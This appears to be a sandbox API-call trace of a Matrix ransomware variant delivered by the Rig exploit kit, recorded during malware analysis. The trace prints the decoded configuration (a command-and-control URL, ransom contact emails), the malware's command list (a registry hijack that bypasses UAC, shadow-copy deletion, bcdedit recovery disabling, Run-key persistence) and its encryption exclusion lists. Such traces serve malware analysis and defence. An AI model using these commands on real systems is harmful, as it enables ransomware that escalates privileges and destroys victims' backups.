CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x72\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0092.066] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x73\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0092.066] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x6f\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0092.066] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x79\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0092.066] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x31\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0092.066] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x4f\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0092.066] LoadStringW (in: hInstance=0x400000, uID=0xff66, lpBuffer=0x12dbd4, cchBufferMax=4096 | out: lpBuffer="32-bit Edition") returned 0xe [0092.066] LoadStringW (in: hInstance=0x400000, uID=0xff65, lpBuffer=0x12dbd0, cchBufferMax=4096 | out: lpBuffer="%s Service Pack %4:d (Version %1:d.%2:d, Build %3:d, %5:s)") returned 0x3a [0092.066] LoadStringW (in: hInstance=0x400000, uID=0xff66, lpBuffer=0x12dbd4, cchBufferMax=4096 | out: lpBuffer="32-bit Edition") returned 0xe [0092.066] LoadStringW (in: hInstance=0x400000, uID=0xff65, lpBuffer=0x12dbd0, cchBufferMax=4096 | out: lpBuffer="%s Service Pack %4:d (Version %1:d.%2:d, 
Build %3:d, %5:s)") returned 0x3a [0092.066] FindResourceW (hModule=0x400000, lpName="CFG", lpType=0xa) returned 0x51c308 [0092.066] LoadResource (hModule=0x400000, hResInfo=0x51c308) returned 0x50d55c [0092.066] SizeofResource (hModule=0x400000, hResInfo=0x51c308) returned 0xef [0092.066] LockResource (hResData=0x50d55c) returned 0x50d55c [0092.066] FreeResource (hResData=0x50d55c) returned 0 [0092.066] FindResourceW (hModule=0x400000, lpName="CHAK", lpType=0xa) returned 0x51c330 [0092.066] LoadResource (hModule=0x400000, hResInfo=0x51c330) returned 0x50d64c [0092.066] SizeofResource (hModule=0x400000, hResInfo=0x51c330) returned 0x26 [0092.066] LockResource (hResData=0x50d64c) returned 0x50d64c [0092.067] GetCPInfo (in: CodePage=0xfde9, lpCPInfo=0x12fa3c | out: lpCPInfo=0x12fa3c) returned 1 [0092.067] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1414f60, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0092.067] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1414f60, cbMultiByte=38, lpWideCharStr=0x140de4c, cchWideChar=38 | out: lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P\r\n42\r\n") returned 38 [0092.067] FreeResource (hResData=0x50d64c) returned 0 [0092.067] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0092.067] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x1414f64, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", lpUsedDefaultChar=0x0) returned 32 [0092.067] GetCurrentThreadId () returned 0xa8c [0092.067] GetCurrentThreadId () returned 0xa8c [0092.067] GetCurrentThreadId () returned 0xa8c [0092.067] 
MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x13ccd18, cbMultiByte=239, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 239 [0092.067] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x13ccd18, cbMultiByte=239, lpWideCharStr=0x13d2e7c, cchWideChar=239 | out: lpWideCharStr="13StarterProcessMutex4\r\n24MainProcessMutex5\r\n35Brother1ProcessMutex6\r\n46Brother2ProcessMutex7\r\n300\r\nCOSLb0cVd9bCx1vp\r\nhttp://statcs.s76.r53.com.ua\r\n131072\r\nbluetablet9643@yahoo.com\r\ndecodedecode@yandex.ru\r\nBl0cked-ReadMe.rtf\r\ndesktop.ini\r\n") returned 239 [0092.067] GetCurrentThreadId () returned 0xa8c [0092.068] GetCurrentThreadId () returned 0xa8c [0092.068] GetCurrentThreadId () returned 0xa8c [0092.068] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\Desktop\\2017-04-03-EITest-Rig-EK-payload-matrix-ransomware-variant.exe\" " [0092.068] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x13c399c, nSize=0x8000 | out: lpDst="C:\\Users\\EEBsYm5") returned 0x11 [0092.068] ExpandEnvironmentStringsW (in: lpSrc="%TEMP%", lpDst=0x13c399c, nSize=0x8000 | out: lpDst="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp") returned 0x24 [0092.068] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x13c39b4, csidl=26, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 1 [0092.071] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x13c39b4, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5\\AppData\\Local") returned 1 [0092.072] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x13c39b4, csidl=7, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 1 [0092.074] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x13c39b4, csidl=24, fCreate=0 | out: pszPath="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 1 [0092.075] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x13c39b4, csidl=0, fCreate=0 | out: 
pszPath="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0092.076] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x13c39b4, csidl=25, fCreate=0 | out: pszPath="C:\\Users\\Public\\Desktop") returned 1 [0092.077] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x13c39b4, csidl=32, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files") returned 1 [0092.078] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x13c39b4, csidl=41, fCreate=0 | out: pszPath="C:\\Windows\\system32") returned 1 [0092.079] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x13c39b4, csidl=40, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5") returned 1 [0092.211] ExpandEnvironmentStringsW (in: lpSrc="%COMPUTERNAME%", lpDst=0x13ac63c, nSize=0x8000 | out: lpDst="CRH2YWU7") returned 0x9 [0092.211] ExpandEnvironmentStringsW (in: lpSrc="%USERNAME%", lpDst=0x13ac63c, nSize=0x8000 | out: lpDst="EEBsYm5") returned 0x8 [0092.212] ExpandEnvironmentStringsW (in: lpSrc="%APPDATA%", lpDst=0x13ac63c, nSize=0x8000 | out: lpDst="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x21 [0092.212] ExpandEnvironmentStringsW (in: lpSrc="%ALLUSERSPROFILE%", lpDst=0x13ac63c, nSize=0x8000 | out: lpDst="C:\\ProgramData") returned 0xf [0092.212] GetTickCount () returned 0x22654 [0092.212] QueryPerformanceCounter (in: lpPerformanceCount=0x12fbc0 | out: lpPerformanceCount=0x12fbc0*=14900082894) returned 1 [0092.212] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb9c, cbMultiByte=1, lpWideCharStr=0x12eb84, cchWideChar=2047 | out: lpWideCharStr="\x76\x7ffb\xfbbc\x12\xfc15\x12\x01") returned 1 [0092.212] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb9c, cbMultiByte=1, lpWideCharStr=0x12eb84, cchWideChar=2047 | out: lpWideCharStr="\x4d\x7ffb\xfbbc\x12\xfc15\x12\x01") returned 1 [0092.212] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb9c, cbMultiByte=1, lpWideCharStr=0x12eb84, cchWideChar=2047 | out: 
lpWideCharStr="\x66\x7ffb\xfbbc\x12\xfc15\x12\x01") returned 1 [0092.212] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb9c, cbMultiByte=1, lpWideCharStr=0x12eb84, cchWideChar=2047 | out: lpWideCharStr="\x43\x7ffb\xfbbc\x12\xfc15\x12\x01") returned 1 [0092.212] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb9c, cbMultiByte=1, lpWideCharStr=0x12eb84, cchWideChar=2047 | out: lpWideCharStr="\x43\x7ffb\xfbbc\x12\xfc15\x12\x01") returned 1 [0092.212] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb9c, cbMultiByte=1, lpWideCharStr=0x12eb84, cchWideChar=2047 | out: lpWideCharStr="\x65\x7ffb\xfbbc\x12\xfc15\x12\x01") returned 1 [0092.212] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb9c, cbMultiByte=1, lpWideCharStr=0x12eb84, cchWideChar=2047 | out: lpWideCharStr="\x52\x7ffb\xfbbc\x12\xfc15\x12\x01") returned 1 [0092.212] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb9c, cbMultiByte=1, lpWideCharStr=0x12eb84, cchWideChar=2047 | out: lpWideCharStr="\x59\x7ffb\xfbbc\x12\xfc15\x12\x01") returned 1 [0092.212] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb9c, cbMultiByte=1, lpWideCharStr=0x12eb84, cchWideChar=2047 | out: lpWideCharStr="\x6b\x7ffb\xfbbc\x12\xfc15\x12\x01") returned 1 [0092.212] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb9c, cbMultiByte=1, lpWideCharStr=0x12eb84, cchWideChar=2047 | out: lpWideCharStr="\x76\x7ffb\xfbbc\x12\xfc15\x12\x01") returned 1 [0092.212] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb9c, cbMultiByte=1, lpWideCharStr=0x12eb84, cchWideChar=2047 | out: lpWideCharStr="\x51\x7ffb\xfbbc\x12\xfc15\x12\x01") returned 1 [0092.212] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb9c, cbMultiByte=1, lpWideCharStr=0x12eb84, cchWideChar=2047 | out: lpWideCharStr="\x79\x7ffb\xfbbc\x12\xfc15\x12\x01") 
returned 1 [0092.212] CreateDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy"), lpSecurityAttributes=0x0) returned 1 [0092.213] FindResourceW (hModule=0x400000, lpName="CMDS", lpType=0xa) returned 0x51c380 [0092.213] LoadResource (hModule=0x400000, hResInfo=0x51c380) returned 0x50d72c [0092.213] SizeofResource (hModule=0x400000, hResInfo=0x51c380) returned 0x582 [0092.213] LockResource (hResData=0x50d72c) returned 0x50d72c [0092.213] FreeResource (hResData=0x50d72c) returned 0 [0092.213] FindResourceW (hModule=0x400000, lpName="CHAK", lpType=0xa) returned 0x51c330 [0092.213] LoadResource (hModule=0x400000, hResInfo=0x51c330) returned 0x50d64c [0092.213] SizeofResource (hModule=0x400000, hResInfo=0x51c330) returned 0x26 [0092.213] LockResource (hResData=0x50d64c) returned 0x50d64c [0092.213] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1415008, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0092.213] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1415008, cbMultiByte=38, lpWideCharStr=0x140deac, cchWideChar=38 | out: lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P\r\n42\r\n") returned 38 [0092.213] FreeResource (hResData=0x50d64c) returned 0 [0092.213] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0092.213] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x141500c, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", lpUsedDefaultChar=0x0) returned 32 [0092.213] GetCurrentThreadId () returned 0xa8c [0092.213] GetCurrentThreadId 
() returned 0xa8c [0092.213] GetCurrentThreadId () returned 0xa8c [0092.214] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x13b27b8, cbMultiByte=1410, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 1410 [0092.214] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x13b27b8, cbMultiByte=1410, lpWideCharStr=0x13ac63c, cchWideChar=1410 | out: lpWideCharStr="%CD%\r\n%SystemRoot%\\system32\\cmd.exe\r\n%SystemRoot%\\system32\\shell32.dll\r\nreg copy \"HKCR\\mscfile\" \"HKCU\\Software\\Classes\\mscfile\" /s /f && reg add \"HKCU\\Software\\Classes\\mscfile\\shell\\open\\command\" /ve /t REG_EXPAND_SZ /d \"[MAIN_PATH]\" /f && \"[AE_PATH]\" & reg delete \"HKCU\\Software\\Classes\\mscfile\" /f\r\nprocess call create \"cmd.exe /c vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\"\r\nvssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\r\nCACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"\r\nreg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /v \"[HTA_NAME]\" /t REG_SZ /f /d \"\\\"[HTA_PATH]\"\\\"\r\ntype \"[FROM_PATH]\" > \"[TO_PATH]\"\r\ntype \"[FROM_PATH]\" > \"[TO_PATH]\" && \"[TO_PATH]\" [PARAMS]\r\nattrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"[FROM_PATH]\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"\r\nexplorer.exe \"[DIR_NAME]\" & type \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"\r\nreg add \"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons\" /f && reg add \"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons\" /v \"29\" /t REG_SZ /f /d \"[ICO_PATH],0\"\r\ntaskkill /f /IM explorer.exe && start explorer.exe\r\n") returned 1410 [0092.214] 
GetCurrentThreadId () returned 0xa8c [0092.214] GetCurrentThreadId () returned 0xa8c [0092.214] GetCurrentThreadId () returned 0xa8c [0092.214] GetCurrentThread () returned 0xfffffffe [0092.214] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x8, OpenAsSelf=1, TokenHandle=0x12fc64 | out: TokenHandle=0x12fc64*=0x0) returned 0 [0092.214] GetLastError () returned 0x3f0 [0092.214] GetCurrentProcess () returned 0xffffffff [0092.214] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x12fc64 | out: TokenHandle=0x12fc64*=0xb8) returned 1 [0092.214] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x2, TokenInformation=0x13aa620, TokenInformationLength=0x400, ReturnLength=0x12fc60 | out: TokenInformation=0x13aa620, ReturnLength=0x12fc60) returned 1 [0092.214] CloseHandle (hObject=0xb8) returned 1 [0092.215] AllocateAndInitializeSid (in: pIdentifierAuthority=0x4e3754, nSubAuthorityCount=0x2, nSubAuthority0=0x20, nSubAuthority1=0x220, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x12fc5c | out: pSid=0x12fc5c*=0x306400*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0092.215] EqualSid (pSid1=0x306400*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), pSid2=0x13aa684*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65))) returned 0 [0092.215] EqualSid (pSid1=0x306400*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), pSid2=0x13aa6a0*(Revision=0x1, SubAuthorityCount=0x1, 
IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0)) returned 0 [0092.215] EqualSid (pSid1=0x306400*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), pSid2=0x13aa6ac*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0092.215] GetCurrentProcess () returned 0xffffffff [0092.215] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x12fc68 | out: TokenHandle=0x12fc68*=0xb8) returned 1 [0092.215] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x12fc64 | out: TokenInformation=0x0, ReturnLength=0x12fc64) returned 0 [0092.215] GetLastError () returned 0x7a [0092.215] LocalAlloc (uFlags=0x0, uBytes=0x14) returned 0x3076a0 [0092.215] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x3076a0, TokenInformationLength=0x14, ReturnLength=0x12fc64 | out: TokenInformation=0x3076a0, ReturnLength=0x12fc64) returned 1 [0092.215] GetSidSubAuthorityCount (pSid=0x3076a8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000)) returned 0x3076a9 [0092.215] GetSidSubAuthority (pSid=0x3076a8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000), nSubAuthority=0x0) returned 0x3076b0 [0092.215] LocalFree (hMem=0x3076a0) returned 0x0 [0092.215] CloseHandle (hObject=0xb8) returned 1 [0092.215] GetDriveTypeW (lpRootPathName="Z:\\") returned 0x1 [0092.215] GetDriveTypeW (lpRootPathName="Y:\\") returned 0x1 [0092.215] GetDriveTypeW (lpRootPathName="X:\\") returned 0x1 [0092.215] GetDriveTypeW 
(lpRootPathName="W:\\") returned 0x1 [0092.216] GetDriveTypeW (lpRootPathName="V:\\") returned 0x1 [0092.216] GetDriveTypeW (lpRootPathName="U:\\") returned 0x1 [0092.216] GetDriveTypeW (lpRootPathName="T:\\") returned 0x1 [0092.216] GetDriveTypeW (lpRootPathName="S:\\") returned 0x1 [0092.216] GetDriveTypeW (lpRootPathName="R:\\") returned 0x1 [0092.216] GetDriveTypeW (lpRootPathName="Q:\\") returned 0x1 [0092.216] GetDriveTypeW (lpRootPathName="P:\\") returned 0x1 [0092.217] GetDriveTypeW (lpRootPathName="O:\\") returned 0x1 [0092.217] GetDriveTypeW (lpRootPathName="N:\\") returned 0x1 [0092.217] GetDriveTypeW (lpRootPathName="M:\\") returned 0x1 [0092.217] GetDriveTypeW (lpRootPathName="L:\\") returned 0x1 [0092.217] GetDriveTypeW (lpRootPathName="K:\\") returned 0x1 [0092.217] GetDriveTypeW (lpRootPathName="J:\\") returned 0x1 [0092.217] GetDriveTypeW (lpRootPathName="I:\\") returned 0x1 [0092.217] GetDriveTypeW (lpRootPathName="H:\\") returned 0x1 [0092.218] GetDriveTypeW (lpRootPathName="G:\\") returned 0x1 [0092.218] GetDriveTypeW (lpRootPathName="F:\\") returned 0x1 [0092.218] GetDriveTypeW (lpRootPathName="E:\\") returned 0x1 [0092.218] GetDriveTypeW (lpRootPathName="D:\\") returned 0x1 [0092.218] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0092.218] FindResourceW (hModule=0x400000, lpName="NDNF", lpType=0xa) returned 0x51c420 [0092.218] LoadResource (hModule=0x400000, hResInfo=0x51c420) returned 0x516824 [0092.218] SizeofResource (hModule=0x400000, hResInfo=0x51c420) returned 0x267 [0092.218] LockResource (hResData=0x516824) returned 0x516824 [0092.218] FreeResource (hResData=0x516824) returned 0 [0092.218] FindResourceW (hModule=0x400000, lpName="CHAK", lpType=0xa) returned 0x51c330 [0092.218] LoadResource (hModule=0x400000, hResInfo=0x51c330) returned 0x50d64c [0092.218] SizeofResource (hModule=0x400000, hResInfo=0x51c330) returned 0x26 [0092.218] LockResource (hResData=0x50d64c) returned 0x50d64c [0092.218] MultiByteToWideChar (in: 
CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1415008, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0092.218] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1415008, cbMultiByte=38, lpWideCharStr=0x140deac, cchWideChar=38 | out: lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P\r\n42\r\n") returned 38 [0092.218] FreeResource (hResData=0x50d64c) returned 0 [0092.218] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0092.218] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x141500c, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", lpUsedDefaultChar=0x0) returned 32 [0092.218] GetCurrentThreadId () returned 0xa8c [0092.218] GetCurrentThreadId () returned 0xa8c [0092.218] GetCurrentThreadId () returned 0xa8c [0092.219] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x13b27b8, cbMultiByte=615, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 615 [0092.219] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x13b27b8, cbMultiByte=615, lpWideCharStr=0x135ae4c, cchWideChar=615 | out: 
lpWideCharStr="[NF_START]\r\nAST\r\nAFN\r\nELST\r\nEXE\r\nLNK\r\nHTA\r\nPEK\r\nSEK\r\nB10CKED\r\nTMP\r\nICO\r\n000\r\nSYS\r\nDAT\r\nRTF\r\nINF\r\nDLL\r\nDAT\r\nREG\r\nDRV\r\nDEV\r\nPIF\r\nMBR\r\nINI\r\nXML\r\nLIST\r\nTTF\r\nLOG\r\nJA\r\nCOM\r\nBAT\r\nCMD\r\nVBS\r\nJS\r\nCFG\r\nDOWNLOAD\r\nNFO\r\nMSI\r\nCHK\r\nDMP\r\nMUI\r\nDUN\r\nISP\r\nISW\r\nCAB\r\nEFI\r\nHLP\r\nMSU\r\nHLP\r\nBIN\r\nLNG\r\nTORRENT_INFO\r\nTORRENT\r\nHTM\r\nHTML\r\nCHM\r\nLANG\r\nSTYLE\r\nMP3\r\nFLAC\r\nOGG\r\nWMA\r\nGIF\r\nJAVA\r\nCUR\r\nANI\r\n[NF_END]\r\n[ND_START]\r\n\\WINDOWS\r\n\\PROGRAM FILES\r\n\\GAMES\r\n\\APPDATA\\\r\n\\APPLICATION DATA\\\r\n\\LOCAL SETTINGS\\\r\n\\TEMP\\\r\n\\PROGRAMDATA\\\r\n\\BOOT\\\r\n\\MSOCACHE\\\r\n\\DEFAULT USER\\\r\n\\SAMPLE\r\n\\EXAMPLE\r\n\\I386\r\n\\TEMPORARY\r\n\\TOR BROWSER\\\r\n\\BROWSER\r\nBROWSER\\\r\n[ND_END]") returned 615 [0092.219] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_START]", cchCount1=10, lpString2="[NF_START]", cchCount2=10) returned 2 [0092.219] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_START]", cchCount1=10, lpString2="[NF_END]", cchCount2=8) returned 3 [0092.219] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0092.219] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0092.219] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0092.219] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0092.219] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0092.219] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0092.219] CompareStringW (Locale=0x400, dwCmpFlags=0x1, 
